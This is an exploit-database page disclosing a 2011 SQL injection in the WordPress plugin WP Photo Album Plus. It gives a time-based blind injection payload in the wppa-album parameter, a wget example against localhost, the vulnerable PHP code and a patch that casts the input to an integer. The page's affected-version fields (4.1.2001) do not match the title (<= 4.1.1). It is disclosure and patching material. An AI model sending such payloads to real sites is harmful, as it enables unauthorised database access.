header-logo
Suggest Exploit
vendor:
WP Photo Album Plus
by:
Skraps
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WP Photo Album Plus
Affected Version From: 4.1.2001
Affected Version To: 4.1.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wp_photo_album_plus
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability

WP Photo Album Plus is vulnerable to a SQL injection vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, modify data, or execute arbitrary system commands.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
# Date: 2011-10-14
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
# Version: 4.1.1 (tested)

---------------
PoC (GET data)
---------------
http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 

e.g.

wget "http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1"

---------------
Vulnerable code
---------------
Line 76 of wppa-functions.php:
if ( $this_occur ) $alb = wppa_get_get('album');
        if ( ! $alb && is_numeric($wppa['start_album']) ) $alb = $wppa['start_album'];

        $separate = wppa_is_separate($alb);

$slide = ( wppa_get_album_title_linktype($alb) == 'slide' ) ? '&amp;wppa-slide' : '';


Line 3170 of wppa-functions.php:
function wppa_get_get($index, $default = false) {
#xdebug_start_trace('/var/www/xdebug.log');
        if (isset($_GET['wppa-'.$index])) {             // New syntax first
                return $_GET['wppa-'.$index];
        }
        if (isset($_GET[$index])) {                             // Old syntax
                return $_GET[$index];
        }
        return $default;
}

Line 3362 of wppa-functions.php:
function wppa_get_album_title_linktype($alb) {
global $wpdb;
        if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
        else $result = '';
echo $result;
        return $result;
}

---------------
Patch
---------------
*** ./wppa-functions.php	2011-10-03 09:37:48.000000000 -0400
--- ./wppa-functions.php.new	2011-10-15 16:02:27.996945496 -0400
***************
*** 3361,3367 ****
  
  function wppa_get_album_title_linktype($alb) {
  global $wpdb;
! 
  	if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
  	else $result = '';
  //echo $result;
--- 3361,3367 ----
  
  function wppa_get_album_title_linktype($alb) {
  global $wpdb;
! 	$alb=intval($alb);
  	if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
  	else $result = '';
  //echo $result;
***************
*** 3384,3387 ****
  global $wppa;
  
  	if ( $wppa['any'] ) echo $wppa['searchresults'];
! }
\ No newline at end of file
--- 3384,3387 ----
  global $wppa;
  
  	if ( $wppa['any'] ) echo $wppa['searchresults'];
! }

Navigation

Suggest Exploit

Services By CQR